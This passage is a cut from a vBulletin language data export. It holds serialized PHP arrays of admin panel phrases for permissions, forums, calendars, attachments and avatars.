usergroup\";s:25:\"default_forum_permissions\";s:25:\"Default Forum Permissions\";s:27:\"delete_selected_permissions\";s:27:\"Delete Selected Permissions\";s:8:\"deny_all\";s:8:\"Deny All\";s:23:\"dismissed_news_item_ids\";s:33:\"Dismissed vBulletin News Item IDs\";s:22:\"edit_forum_permissions\";s:22:\"Edit Forum Permissions\";s:49:\"edit_forum_permissions_for_usergroup_x_in_forum_y\";s:70:\"Edit Forum Permissions For Usergroup: %1$s in Forum %2$s\";s:22:\"events_are_unmoderated\";s:31:\"Posted Events are Not Moderated\";s:29:\"follow_forum_moderation_rules\";s:92:\"Follow Forum Moderation RulesIf no, posts are always placed into moderation queue\";s:37:\"follow_group_message_moderation_rules\";s:110:\"Follow Social Group Message Moderation RulesIf no, messages are always placed into moderation queue\";s:39:\"follow_picture_comment_moderation_rules\";s:39:\"Follow Picture Comment Moderation Rules\";s:31:\"follow_picture_moderation_rules\";s:31:\"Follow Picture Moderation Rules\";s:39:\"follow_visitor_message_moderation_rules\";s:105:\"Follow Visitor Message Moderation RulesIf no, messages are always placed into moderation queue\";s:33:\"forum_based_permission_duplicator\";s:33:\"Forum-Based Permission Duplicator\";s:17:\"forum_permissions\";s:17:\"Forum Permissions\";s:25:\"forum_permissions_manager\";s:25:\"Forum Permissions Manager\";s:27:\"forum_searching_permissions\";s:27:\"Forum Searching Permissions\";s:25:\"forum_viewing_permissions\";s:25:\"Forum Viewing Permissions\";s:19:\"general_permissions\";s:19:\"General Permissions\";s:32:\"give_admin_access_arbitrary_html\";s:164:\"Giving a user administrative access will allow him or her to create announcements which may contain arbitrary HTML. Only grant this access if you trust this person.\";s:64:\"inherited_using_custom_permissions_inherited_from_a_parent_forum\";s:72:\"Inherited: Using custom permissions inherited from a parent forum\";s:15:\"is_banned_group\";s:269:\"This Usergroup is not a \'Banned\' Group (Setting this to no will cause the group to be treated as a banned group, this will prevent the sending of email notifications, show a banned error message on the permission error pages and other unspecified behaviors.)\";s:18:\"is_super_moderator\";s:44:\"Can Moderate All Forums (is Super Moderator)\";s:36:\"making_x_a_member_of_the_usergroup_y\";s:43:\"Making %1$s a member of the usergroup %2$s.\";s:22:\"maximum_created_groups\";s:88:\"Maximum Created GroupsThe amount of groups the user can have at any one time.\";s:30:\"maximum_recipients_to_send_pms\";s:141:\"Maximum Recipients to Send PMs at a time:Do not set this too high for performance reasons (set to 0 to allow unlimited recipients)\";s:23:\"maximum_stored_messages\";s:124:\"Maximum Stored Messages:If you set this to 0 users from this usergroup will not be able to use private messaging.\";s:25:\"message_throttle_quantity\";s:121:\"Message Throttle QuantityThis limits the amount of messages the user can send within the Throttle Check Period\";s:30:\"must_enable_custom_permissions\";s:91:\"For this setting to have any effect, custom permissions for this usergroup must be enabled.\";s:34:\"note_groups_marked_with_a_asterisk\";s:153:\"Note: Groups marked with an * can be selected by their members to override the username markup and user title from their primary usergroup.\";s:32:\"only_copy_permissions_from_forum\";s:65:\"Only Copy Permissions from Forum (Includes sub-forums)\";s:32:\"only_copy_permissions_from_group\";s:37:\"Only Copy Permissions from User Group\";s:14:\"order_by_forum\";s:14:\"Order By Forum\";s:18:\"order_by_usergroup\";s:18:\"Order By Usergroup\";s:25:\"other_users_can_be_posted\";s:41:\"User Notes Can Be Posted About This Group\";s:27:\"overwrite_duplicate_entries\";s:27:\"Overwrite Duplicate Entries\";s:27:\"overwrite_inherited_entries\";s:27:\"Overwrite Inherited Entries\";s:15:\"password_expiry\";s:171:\"Password Expiry (If you specify a number of days here, users will be required to change their password when this amount of time elapsed since they last changed)\";s:16:\"password_history\";s:243:\"Password History (If you specify a number of days here, users will not be allowed to change their password to a value that they have used in the past x days.
Note: this setting has no effect if password expiry is set to 0 days)
\";s:28:\"permission_duplication_tools\";s:28:\"Permission Duplication Tools\";s:27:\"permission_overwrite_notice\";s:106:\"Note: These permissions will overwrite any existing permissions for this forum for the selected usergroups\";s:11:\"permissions\";s:11:\"Permissions\";s:24:\"permissions_quick_editor\";s:24:\"Permissions Quick Editor\";s:29:\"picture_uploading_permissions\";s:29:\"Picture Uploading Permissions\";s:16:\"poll_permissions\";s:16:\"Poll Permissions\";s:16:\"post_permissions\";s:16:\"Post Permissions\";s:23:\"post_thread_permissions\";s:25:\"Post / Thread Permissions\";s:27:\"private_message_permissions\";s:27:\"Private Message Permissions\";s:28:\"profile_picture_max_filesize\";s:68:\"Profile Picture Maximum File Size (bytes)1KB = 1024 bytes\";s:26:\"profile_picture_max_height\";s:39:\"Profile Picture Maximum Height (pixels)\";s:25:\"profile_picture_max_width\";s:38:\"Profile Picture Maximum Width (pixels)\";s:28:\"quick_forum_permission_setup\";s:28:\"Quick Forum Permission Setup\";s:16:\"require_hv_check\";s:209:\"Require Human Verification on Configured Actions\r\nUsers will have to pass human verification for the configured Human Verified Actions.\";s:38:\"show_edited_by_note_on_edited_messages\";s:46:\"Show edited by note on edited messages?\";s:22:\"sig_image_max_filesize\";s:40:\"Signature Image Maximum Filesize (bytes)\";s:20:\"sig_image_max_height\";s:39:\"Signature Image Maximum Height (pixels)\";s:19:\"sig_image_max_width\";s:38:\"Signature Image Maximum Width (pixels)\";s:13:\"sig_max_chars\";s:73:\"Maximum Characters in Signature Excluding BB Code Markup\";s:14:\"sig_max_images\";s:37:\"Maximum Number of Images in Signature\";s:13:\"sig_max_lines\";s:26:\"Maximum Lines in Signature\";s:17:\"sig_max_raw_chars\";s:73:\"Maximum Characters in Signature Including BB Code Markup\";s:19:\"sig_max_size_bbcode\";s:39:\"Maximum Value of x for [SIZE=x] BB Code\";s:21:\"signature_permissions\";s:21:\"Signature Permissions\";s:26:\"social_group_icon_max_size\";s:146:\"Maximum File Size of Social Group Icons (bytes) \r\nNote: Social Group Image Icons are always limited to 200px by 200px.\";s:24:\"social_group_permissions\";s:25:\"Social Groups Permissions\";s:26:\"space_in_bytes_attachlimit\";s:107:\"Space (in bytes) that a user\'s total attachment usage may consume (Set to 0 to not have a limit)\";s:22:\"use_custom_permissions\";s:22:\"Use Custom Permissions\";s:23:\"use_default_permissions\";s:94:\"Use Usergroup Default Permissions (Note: this will delete any previous custom permissions set)\";s:22:\"user_album_permissions\";s:22:\"User Album Permissions\";s:29:\"user_infraction_banning_level\";s:29:\"User Infraction Banning Level\";s:27:\"user_infraction_permissions\";s:27:\"User Infraction Permissions\";s:21:\"user_note_permissions\";s:21:\"User Note Permissions\";s:16:\"user_permissions\";s:16:\"User Permissions\";s:27:\"user_reputation_permissions\";s:27:\"User Reputation Permissions\";s:19:\"usercss_permissions\";s:33:\"Profile Customization Permissions\";s:37:\"usergroup_based_permission_duplicator\";s:38:\"User Group-Based Permission Duplicator\";s:20:\"usergroup_user_title\";s:124:\"User Title (Use this to override the default \'ladder\' of user titles)\";s:15:\"username_markup\";s:266:\"Username HTML Markup (Specify an opening and closing HTML tag with which to display the names of users in this group. This applies to names that appear on Logged-in Users, Who\'s Online, Users Browsing Forum, Users Browsing Thread, Posts, Member List etc.)\";s:22:\"view_control_panel_log\";s:22:\"View Control Panel Log\";s:22:\"view_forum_permissions\";s:22:\"View Forum Permissions\";s:16:\"view_permissions\";s:16:\"View Permissions\";s:22:\"viewable_on_memberlist\";s:110:\"Viewable on the Memberlist (Sets whether or not users in this group will appear on the member list)\";s:22:\"viewable_on_showgroups\";s:167:\"Viewable on Show Groups (Sets whether or not to show members of this group on the \'View Forum Leaders\' page)\";s:27:\"visitor_message_permissions\";s:27:\"Visitor Message Permissions\";s:23:\"whos_online_permissions\";s:24:\"Who\'s Online Permissions\";s:18:\"x_access_masks_set\";s:23:\"%1$s Access Mask(s) set\";s:40:\"x_is_already_a_member_of_the_usergroup_y\";s:54:\"%1$s is already a member of the usergroup %2$s.\";}', 'a:71:{s:14:\"access_options\";s:14:\"Access Options\";s:12:\"act_as_forum\";s:52:\"Act as Forum (Will act as category if no)\";s:16:\"add_announcement\";s:16:\"Add Announcement\";s:15:\"add_child_forum\";s:15:\"Add Child Forum\";s:13:\"add_moderator\";s:13:\"Add Moderator\";s:13:\"add_new_forum\";s:13:\"Add New Forum\";s:11:\"allow_icons\";s:16:\"Allow Post Icons\";s:34:\"allow_thread_ratings_in_this_forum\";s:34:\"Allow Thread Ratings in this Forum\";s:26:\"apply_password_to_children\";s:64:\"Apply This Password to Child Forums (Only if changed)\";s:35:\"are_you_sure_want_to_delete_forum_x\";s:159:\"Are you sure you want to delete the forum called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:42:\"are_you_sure_you_want_to_delete_this_forum\";s:90:\"Are you sure you want to delete this forum? Note that any sub-forums will also be deleted!\";s:17:\"can_have_password\";s:178:\"Can Have Password (Setting this to no will prevent a password from being inherited and from being set by moderators)
(Note: You may still set a password manually)
\";s:8:\"category\";s:8:\"Category\";s:20:\"count_posts_in_forum\";s:55:\"Count Posts Made in this Forum Towards User Post Counts\";s:31:\"create_forum_based_off_of_forum\";s:32:\"Create Forum Based off of Forum:\";s:18:\"custom_forum_style\";s:27:\"Custom Style for this Forum\";s:18:\"default_sort_field\";s:18:\"Default Sort Field\";s:18:\"default_sort_order\";s:18:\"Default Sort Order\";s:12:\"delete_forum\";s:12:\"Delete Forum\";s:23:\"do_not_change_usergroup\";s:23:\"DO NOT CHANGE USERGROUP\";s:18:\"edit_display_order\";s:18:\"Edit Display Order\";s:10:\"edit_forum\";s:10:\"Edit Forum\";s:13:\"edit_password\";s:13:\"Edit Password\";s:26:\"emails_to_notify_when_post\";s:98:\"Email Addresses to Notify When there is a New Post (Separate each address with a SPACE)\";s:28:\"emails_to_notify_when_thread\";s:100:\"Email Addresses to Notify When there is a New Thread (Separate each address with a SPACE)\";s:12:\"empty_forums\";s:12:\"Empty Forums\";s:6:\"expand\";s:6:\"Expand\";s:8:\"explicit\";s:8:\"Explicit\";s:15:\"forum_is_active\";s:109:\"Forum is Active (Will not appear if set to no, but remains accessible if the forum\'s URL is known)\";s:10:\"forum_link\";s:114:\"Forum Link (Entering a URL here will cause anyone clicking the forum link to be redirected to that URL)\";s:13:\"forum_manager\";s:13:\"Forum Manager\";s:10:\"forum_open\";s:100:\"Forum is Open (Set this to \'No\' to prevent any new posts being made in this forum)\";s:14:\"forum_password\";s:103:\"Forum Password (Optional: This acts in addition to any other permissions set for this forum)\";s:45:\"forums_marked_asterisk_are_password_protected\";s:45:\"Forums Marked * are Password-Protected\";s:9:\"image_url\";s:57:\"Image URLMinimum 300x300. Must be .jpg or .png\";s:15:\"index_new_posts\";s:126:\"Index New Posts in Search Engine (Setting this to \'No\' will prevent anyone from being able to search in this forum)\";s:8:\"keywords\";s:39:\"KeywordsSeparate with commas\";s:4:\"link\";s:4:\"Link\";s:15:\"list_moderators\";s:15:\"List Moderators\";s:12:\"media_author\";s:12:\"Media Author\";s:20:\"moderate_attachments\";s:20:\"Moderate Attachments\";s:14:\"moderate_posts\";s:14:\"Moderate Posts\";s:16:\"moderate_threads\";s:16:\"Moderate Threads\";s:18:\"moderation_options\";s:18:\"Moderation Options\";s:21:\"override_style_choice\";s:181:\"Override Users\' Style Choice (If this forum uses a custom style, this will force users with a different style choice to see the forum with the style you specified)\";s:11:\"owner_email\";s:11:\"Owner Email\";s:10:\"owner_name\";s:10:\"Owner Name\";s:3:\"pda\";s:3:\"PDA\";s:19:\"please_select_forum\";s:21:\"Please select a forum\";s:16:\"podcast_settings\";s:16:\"Podcast Settings\";s:15:\"posting_options\";s:15:\"Posting Options\";s:30:\"prefix_for_forum_status_images\";s:161:\"Prefix for Forum Status Images\r\n(This prefix will be used on status image filenames for a forum, it can only contain A-Z, 0-9, -, _, . and /)\";s:65:\"require_moderator_validation_before_new_attachments_are_displayed\";s:65:\"Require moderator validation before new attachments are displayed\";s:59:\"require_moderator_validation_before_new_posts_are_displayed\";s:59:\"Require moderator validation before new posts are displayed\";s:61:\"require_moderator_validation_before_new_threads_are_displayed\";s:61:\"Require moderator validation before new threads are displayed\";s:27:\"require_threads_have_prefix\";s:32:\"Require Threads to have a Prefix\";s:16:\"show_all_threads\";s:16:\"Show all threads\";s:24:\"show_forum_on_forum_jump\";s:55:\"Show this Forum and Child Forums on the Forum Jump Menu\";s:18:\"show_private_forum\";s:408:\"Show Private Forum(Select \'No\' here to hide this forum from users who are not allowed to access it. Users who do have permission to access it will have to log in before they can see this forum.
This option applies to any forum listing, including the Forum Jump menu, and Search Results.
Selecting \'Use default\' will use the system default as defined in Forum Listings Display Options.)
\";s:13:\"style_options\";s:13:\"Style Options\";s:8:\"subtitle\";s:8:\"Subtitle\";s:7:\"summary\";s:7:\"Summary\";s:11:\"use_default\";s:11:\"Use Default\";s:17:\"use_default_style\";s:17:\"Use Default Style\";s:24:\"use_selected_prefix_sets\";s:24:\"Use Selected Prefix Sets\";s:10:\"view_forum\";s:10:\"View Forum\";s:17:\"view_full_version\";s:17:\"View Full Version\";s:16:\"view_permissions\";s:16:\"View Permissions\";s:9:\"x_replies\";s:12:\"%1$s replies\";s:23:\"yes_display_post_counts\";s:25:\"Yes - Display Post Counts\";s:20:\"yes_hide_post_counts\";s:22:\"Yes - Hide Post Counts\";}', 'a:133:{s:16:\"add_new_calendar\";s:16:\"Add New Calendar\";s:20:\"add_new_custom_field\";s:20:\"Add New Custom Field\";s:13:\"add_new_event\";s:13:\"Add New Event\";s:15:\"add_new_holiday\";s:15:\"Add New Holiday\";s:31:\"add_new_moderator_to_calendar_x\";s:62:\"Add New Moderator to Calendar %1$s\";s:12:\"add_reminder\";s:12:\"Add Reminder\";s:7:\"all_day\";s:7:\"All Day\";s:57:\"allow_user_to_input_their_own_value_for_this_custom_field\";s:57:\"Allow user to input their own value for this Custom Field\";s:48:\"are_you_sure_want_to_delete_calendar_moderator_x\";s:172:\"Are you sure you want to delete the calendar moderator called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:38:\"are_you_sure_want_to_delete_calendar_x\";s:162:\"Are you sure you want to delete the calendar called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:51:\"are_you_sure_want_to_delete_custom_calendar_field_x\";s:175:\"Are you sure you want to delete the custom calendar field called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:52:\"are_you_sure_you_want_to_delete_the_holiday_called_x\";s:160:\"Are you sure you want to delete the holiday called \'%1$s\'?
(holidayid: %2$s)

This action cannot be undone.\";s:36:\"birthday_count_max_birthdays_per_day\";s:179:\"Birthday Count (Sets the maximum number of birthdays to be listed on a single day in the monthly view before a single link to all that day\'s Birthdays is shown instead)\";s:13:\"calendar_jump\";s:13:\"Calendar Jump\";s:16:\"calendar_manager\";s:16:\"Calendar Manager\";s:13:\"calendar_mode\";s:13:\"Calendar Mode\";s:20:\"calendar_permissions\";s:20:\"Calendar Permissions\";s:11:\"choose_time\";s:11:\"Choose Time\";s:29:\"confirm_deletion_of_holiday_x\";s:61:\"Confirm Deletion of Holiday: %1$s\";s:12:\"custom_field\";s:12:\"Custom Field\";s:10:\"date_first\";s:5:\"First\";s:9:\"date_last\";s:4:\"Last\";s:14:\"date_range_dfn\";s:175:\"Date Range Beginning and ending years in the format of:
Example: %1$s

Start year must be greater than 1969. End Year must be less than 2038.
\";s:11:\"date_x_to_y\";s:12:\"%1$s to %2$s\";s:12:\"default_view\";s:84:\"Default ViewView the user is presented with when they enter the calendar.\";s:12:\"delete_event\";s:12:\"Delete Event\";s:30:\"delete_reminder_for_this_event\";s:30:\"Delete Reminder for this Event\";s:16:\"delete_reminders\";s:16:\"Delete Reminders\";s:55:\"edit_calendar_permissions_for_usergroup_x_in_calendar_y\";s:76:\"Edit Calendar Permissions For Usergroup:
%1$s in Calendar %2$s\";s:10:\"edit_event\";s:10:\"Edit Event\";s:31:\"edit_moderator_x_for_calendar_y\";s:51:\"Edit Moderator %1$s for Calendar %2$s\";s:11:\"eight_hours\";s:11:\"Eight Hours\";s:14:\"eighteen_hours\";s:14:\"Eighteen Hours\";s:27:\"emails_to_notify_when_event\";s:113:\"Email Addresses to Notify When There is a New Event (Separate each address with a space or line break)\";s:3:\"end\";s:3:\"End\";s:30:\"event_count_max_events_per_day\";s:169:\"Event Count(Sets the maximum number of events to be listed on a single day in the monthly view before a single link to all that day\'s Events is shown instead)\";s:10:\"event_date\";s:10:\"Event Date\";s:17:\"event_ignores_dst\";s:64:\"The times shown will remain constant, regardless of DST changes.\";s:17:\"event_information\";s:17:\"Event Information\";s:18:\"event_notification\";s:18:\"Event Notification\";s:13:\"event_options\";s:13:\"Event Options\";s:27:\"event_posted_for_timezone_x\";s:111:\"This event was posted for time zone %1$s so it will appear to occur on a different day on your calendar.\";s:12:\"event_poster\";s:12:\"Event Poster\";s:14:\"event_reminder\";s:14:\"Event Reminder\";s:18:\"event_title_cutoff\";s:161:\"Event Title Cutoff (Sets the maximum number of characters of an event title that are shown on the monthly view.
To disable the cutoff, enter \'0\')
\";s:14:\"event_uses_dst\";s:53:\"The times shown may change, depending on DST settings\";s:6:\"events\";s:6:\"Events\";s:5:\"every\";s:5:\"Every\";s:13:\"every_weekday\";s:13:\"Every weekday\";s:12:\"every_x_days\";s:276:\"\r\n day(s)\";s:9:\"every_x_y\";s:15:\"Every %1$s %2$s\";s:10:\"four_hours\";s:10:\"Four Hours\";s:6:\"fourth\";s:6:\"Fourth\";s:11:\"friday_abbr\";s:3:\"Fri\";s:12:\"friday_short\";s:1:\"F\";s:7:\"holiday\";s:7:\"Holiday\";s:42:\"if_you_would_like_to_remove_this_moderator\";s:42:\"If You Would Like to Remove this Moderator\";s:13:\"jump_to_month\";s:13:\"Jump to month\";s:18:\"maintain_same_time\";s:65:\"Maintain same time throughout the year, regardless of DST changes\";s:27:\"members_with_birthdays_on_x\";s:30:\"Members with Birthdays on %1$s\";s:6:\"midday\";s:6:\"Midday\";s:8:\"midnight\";s:8:\"Midnight\";s:15:\"moderate_events\";s:15:\"Moderate Events\";s:18:\"moderation_options\";s:18:\"Moderation Options\";s:11:\"monday_abbr\";s:3:\"Mon\";s:12:\"monday_short\";s:1:\"M\";s:12:\"monthly_view\";s:12:\"Monthly View\";s:10:\"move_event\";s:10:\"Move Event\";s:22:\"move_event_to_calendar\";s:22:\"Move Event to Calendar\";s:2:\"of\";s:2:\"of\";s:17:\"of_every_x_months\";s:153:\"of every\r\n \r\n month(s)\";s:7:\"one_day\";s:7:\"One Day\";s:8:\"one_hour\";s:8:\"One Hour\";s:11:\"or_set_time\";s:11:\"or Set Time\";s:12:\"ranged_event\";s:12:\"Ranged Event\";s:19:\"recur_every_x_weeks\";s:281:\"\r\n week(s) on\";s:18:\"recurrence_pattern\";s:18:\"Recurrence Pattern\";s:15:\"recurring_event\";s:15:\"Recurring Event\";s:16:\"recurring_option\";s:16:\"Recurring Option\";s:8:\"reminder\";s:8:\"Reminder\";s:36:\"reminder_emails_can_be_early_or_late\";s:180:\"Reminder emails can be slightly early or late. For example, a reminder scheduled for one hour before the event, will actually be sent between 1:15 and 45 minutes before the event.\";s:31:\"request_reminder_for_this_event\";s:31:\"Request Reminder for this Event\";s:60:\"require_moderator_validation_before_new_events_are_displayed\";s:60:\"Require moderator validation before new events are displayed\";s:13:\"saturday_abbr\";s:3:\"Sat\";s:14:\"saturday_short\";s:1:\"S\";s:10:\"save_event\";s:10:\"Save Event\";s:15:\"selected_events\";s:16:\"Selected Events:\";s:31:\"show_birthdays_on_this_calendar\";s:31:\"Show Birthdays on this Calendar\";s:37:\"show_easter_holidays_on_this_calendar\";s:41:\"Show predefined holidays on this Calendar\";s:30:\"show_holidays_on_this_calendar\";s:44:\"Show admin defined holidays on this Calendar\";s:10:\"show_today\";s:10:\"Show Today\";s:39:\"show_upcoming_events_from_this_calendar\";s:60:\"Show upcoming events from this Calendar on the forum index\r\n\";s:12:\"show_weekend\";s:175:\"Show Saturday / Sunday on this Calendar (Setting this to \'No\' forces the calendar to display only Monday to Friday, ignoring the user\'s start of week option)\";s:20:\"single_all_day_event\";s:21:\"Single, All Day Event\";s:9:\"six_hours\";s:9:\"Six Hours\";s:5:\"start\";s:5:\"Start\";s:13:\"start_of_week\";s:145:\"Start of the Week (Sets the default first day for the calendar, which will be shown to guests with no start of week preference)\";s:11:\"sunday_abbr\";s:3:\"Sun\";s:12:\"sunday_short\";s:1:\"S\";s:12:\"the_dropdown\";s:3:\"The\";s:12:\"the_x_y_of_z\";s:21:\"The %1$s %2$s of %3$s\";s:5:\"third\";s:5:\"Third\";s:31:\"this_event_occurs_every_weekday\";s:31:\"This event occurs every weekday\";s:30:\"this_event_occurs_every_x_days\";s:35:\"This event occurs every %1$s day(s)\";s:36:\"this_event_occurs_every_x_weeks_on_y\";s:44:\"This event occurs every %1$s week(s) on %2$s\";s:27:\"this_event_occurs_every_x_y\";s:33:\"This event occurs every %1$s %2$s\";s:44:\"this_event_occurs_on_day_x_of_every_y_months\";s:52:\"This event occurs on day %1$s of every %2$s month(s)\";s:35:\"this_event_occurs_on_every_x_y_of_z\";s:44:\"This event occurs on every %1$s %2$s of %3$s\";s:46:\"this_event_occurs_on_the_x_y_of_every_z_months\";s:57:\"This event occurs on the %1$s %2$s of every %3$s month(s)\";s:10:\"three_days\";s:10:\"Three Days\";s:11:\"three_hours\";s:11:\"Three Hours\";s:13:\"thursday_abbr\";s:3:\"Thu\";s:14:\"thursday_short\";s:1:\"T\";s:11:\"time_x_to_y\";s:64:\"%1$s to %2$s\";s:9:\"time_zone\";s:9:\"Time Zone\";s:20:\"to_delete_this_event\";s:73:\"To delete this event, click this box and press the \'Delete Event\' button.\";s:12:\"tuesday_abbr\";s:3:\"Tue\";s:13:\"tuesday_short\";s:1:\"T\";s:12:\"twelve_hours\";s:12:\"Twelve Hours\";s:8:\"two_days\";s:8:\"Two Days\";s:9:\"two_hours\";s:9:\"Two Hours\";s:16:\"update_reminders\";s:16:\"Update Reminders\";s:24:\"view_this_week_in_detail\";s:24:\"View This Week in Detail\";s:14:\"wednesday_abbr\";s:3:\"Wed\";s:15:\"wednesday_short\";s:1:\"W\";s:6:\"weekly\";s:6:\"Weekly\";s:11:\"weekly_view\";s:11:\"Weekly View\";s:34:\"when_to_send_reminder_before_event\";s:34:\"When to send reminder before event\";s:10:\"x_birthday\";s:15:\"%1$s\'s birthday\";s:11:\"x_birthdays\";s:14:\"%1$s Birthdays\";s:6:\"yearly\";s:6:\"Yearly\";s:11:\"yearly_view\";s:11:\"Yearly View\";s:27:\"you_have_no_event_reminders\";s:28:\"You have no event reminders.\";}', 'a:205:{s:19:\"add_a_single_avatar\";s:19:\"Add a Single Avatar\";s:22:\"add_a_single_post_icon\";s:22:\"Add a Single Post Icon\";s:19:\"add_a_single_smilie\";s:19:\"Add a Single Smilie\";s:10:\"add_avatar\";s:10:\"Add Avatar\";s:11:\"add_avatars\";s:11:\"Add Avatars\";s:20:\"add_multiple_avatars\";s:20:\"Add Multiple Avatars\";s:23:\"add_multiple_post_icons\";s:23:\"Add Multiple Post Icons\";s:20:\"add_multiple_smilies\";s:20:\"Add Multiple Smilies\";s:23:\"add_new_attachment_type\";s:23:\"Add New Attachment Type\";s:23:\"add_new_avatar_category\";s:23:\"Add New Avatar Category\";s:17:\"add_new_extension\";s:17:\"Add New Extension\";s:26:\"add_new_post_icon_category\";s:26:\"Add New Post Icon Category\";s:23:\"add_new_smilie_category\";s:23:\"Add New Smilie Category\";s:13:\"add_post_icon\";s:13:\"Add Post Icon\";s:14:\"add_post_icons\";s:14:\"Add Post Icons\";s:10:\"add_smilie\";s:10:\"Add Smilie\";s:11:\"add_smilies\";s:11:\"Add Smilies\";s:38:\"adding_multiple_avatars_reading_from_x\";s:48:\"Adding Multiple Avatars
Reading from %1$s\";s:41:\"adding_multiple_post_icons_reading_from_x\";s:51:\"Adding Multiple Post Icons Reading from %1$s\";s:38:\"adding_multiple_smilies_reading_from_x\";s:48:\"Adding Multiple Smilies Reading from %1$s\";s:21:\"album_picture_manager\";s:21:\"Album Picture Manager\";s:14:\"album_pictures\";s:14:\"Album Pictures\";s:47:\"album_pictures_currently_file_system_with_thumb\";s:93:\"Album pictures are currently being stored in the file system with direct access to thumbnails\";s:50:\"album_pictures_currently_file_system_without_thumb\";s:96:\"Album pictures are currently being stored in the file system without direct access to thumbnails\";s:36:\"album_pictures_currently_in_database\";s:57:\"Album pictures are currently being stored in the database\";s:36:\"are_you_sure_want_to_delete_avatar_x\";s:160:\"Are you sure you want to delete the avatar called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:39:\"are_you_sure_want_to_delete_post_icon_x\";s:163:\"Are you sure you want to delete the post icon called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:36:\"are_you_sure_want_to_delete_smilie_x\";s:160:\"Are you sure you want to delete the smilie called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:53:\"are_you_sure_you_want_to_delete_the_attachment_type_x\";s:60:\"Are you sure you want to delete the attachment type: \'%1$s\'?\";s:48:\"are_you_sure_you_want_to_delete_the_attachment_x\";s:55:\"Are you sure you want to delete the attachment: \'%1$s\'?\";s:60:\"are_you_sure_you_want_to_delete_the_avatar_category_called_x\";s:459:\"Are you sure you want to delete the avatar category called: \'%1$s\'?\r\n

\r\nDelete all Avatars from this category? Yes No

If you do not want to delete all Avatars from this category, they will all be moved to the category selected below.

Destination Category: \";s:63:\"are_you_sure_you_want_to_delete_the_post_icon_category_called_x\";s:464:\"Are you sure you want to delete the post icon category called: \'%1$s\'?

Delete all Post Icons from this category? Yes No

If you do not want to delete all Post Icons from this category, they will all be moved to the category selected below.

Destination Category: \";s:60:\"are_you_sure_you_want_to_delete_the_smilie_category_called_x\";s:455:\"Are you sure you want to delete the Smilie category called: \'%1$s\'?

Delete all Smilies from this category? Yes No

If you do not want to delete all Smilies from this category, they will all be moved to the category selected below.

Destination Category: \";s:49:\"are_you_sure_you_want_to_delete_these_attachments\";s:50:\"Are you sure you want to delete these attachments?\";s:14:\"attached_after\";s:47:\"Attached After (yyyy-mm-dd hh:mm:ss)\";s:15:\"attached_before\";s:48:\"Attached Before (yyyy-mm-dd hh:mm:ss)\";s:11:\"attached_by\";s:33:\"Attached By (username)\";s:24:\"attachment_file_path_dfn\";s:118:\"Attachment File PathThis file path should be readable AND writeable by your web server (usually chmod 0777)\";s:21:\"attachment_is_visible\";s:21:\"Attachment is Visible\";s:18:\"attachment_manager\";s:18:\"Attachment Manager\";s:22:\"attachment_permissions\";s:22:\"Attachment Permissions\";s:30:\"attachment_permissions_manager\";s:30:\"Attachment Permissions Manager\";s:18:\"attachment_removal\";s:883:\"We have completed moving attachments to the filesystem. Presently, the attachments still remain in the database and are being read from there. If you are sure that the process completed without incident, go ahead and select yes below to remove the attachments from the database. This step cannot be reversed and may take a few minutes depending on the size of your database. Please be patient.

\r\nAttachments in Database: %1$s
\r\nTotal Attachments Processed: %2$s

\r\nThe above two values should be the same!

\r\nNumber of Attachments that could not be created or are 0 bytes: %3$s
\r\nThe above value should be 0! Having 0 byte attachments is not uncommon so a few is nothing to worry about but if the number equals the number of attachments in the database then DO NOT FINALIZE this step or you will lose all of your attachments.\";s:15:\"attachment_type\";s:15:\"Attachment Type\";s:21:\"attachmentid_start_at\";s:146:\"Attachmentid to start at:Set this if you have partially completed a conversion. You should start at 0 to insure an error free transfer.\";s:54:\"attachments_are_currently_being_stored_in_the_database\";s:54:\"Attachments are currently being stored in the database\";s:61:\"attachments_are_currently_being_stored_in_the_filesystem_at_x\";s:64:\"Attachments are currently being stored in the filesystem at %1$s\";s:28:\"attachments_to_show_per_page\";s:28:\"Attachments to Show Per Page\";s:6:\"avatar\";s:6:\"Avatar\";s:15:\"avatar_category\";s:15:\"Avatar Category\";s:16:\"avatar_file_path\";s:16:\"Avatar File Path\";s:20:\"avatar_file_path_dfn\";s:114:\"Avatar File PathThis file path should be readable AND writeable by your web server (usually chmod 0777)\";s:14:\"avatar_manager\";s:14:\"Avatar Manager\";s:18:\"avatar_permissions\";s:18:\"Avatar Permissions\";s:59:\"avatars_are_currently_being_served_from_the_filesystem_at_x\";s:62:\"Avatars are currently being served from the filesystem at %1$s\";s:15:\"avatars_deleted\";s:15:\"Avatars Deleted\";s:17:\"avatars_file_path\";s:17:\"Avatars File Path\";s:24:\"avatars_to_show_per_page\";s:24:\"Avatars to Show Per Page\";s:27:\"average_attachment_filesize\";s:27:\"Average Attachment Filesize\";s:28:\"can_use_this_avatar_category\";s:28:\"Can Use This Avatar Category\";s:22:\"can_use_this_extension\";s:22:\"Can use this extension\";s:31:\"can_use_this_post_icon_category\";s:31:\"Can Use This Post Icon Category\";s:28:\"can_use_this_smilie_category\";s:28:\"Can Use This Smilie Category\";s:26:\"confirm_attachment_removal\";s:26:\"Confirm Attachment Removal\";s:37:\"confirm_deletion_of_attachment_type_x\";s:69:\"Confirm Deletion of Attachment Type: %1$s\";s:37:\"confirm_deletion_of_avatar_category_x\";s:69:\"Confirm Deletion of Avatar Category: %1$s\";s:40:\"confirm_deletion_of_post_icon_category_x\";s:72:\"Confirm Deletion of Post Icon Category: %1$s\";s:37:\"confirm_deletion_of_smilie_category_x\";s:69:\"Confirm Deletion of Smilie Category: %1$s\";s:28:\"confirm_picture_data_removal\";s:28:\"Confirm Picture Data Removal\";s:8:\"contains\";s:8:\"Contains\";s:29:\"custom_attachment_permissions\";s:29:\"Custom Attachment Permissions\";s:27:\"delete_selected_attachments\";s:27:\"Delete Selected Attachments\";s:15:\"disk_space_used\";s:15:\"Disk Space Used\";s:9:\"downloads\";s:9:\"Downloads\";s:22:\"downloads_greater_than\";s:21:\"More Than X Downloads\";s:19:\"downloads_less_than\";s:21:\"Less Than X Downloads\";s:15:\"edit_attachment\";s:15:\"Edit 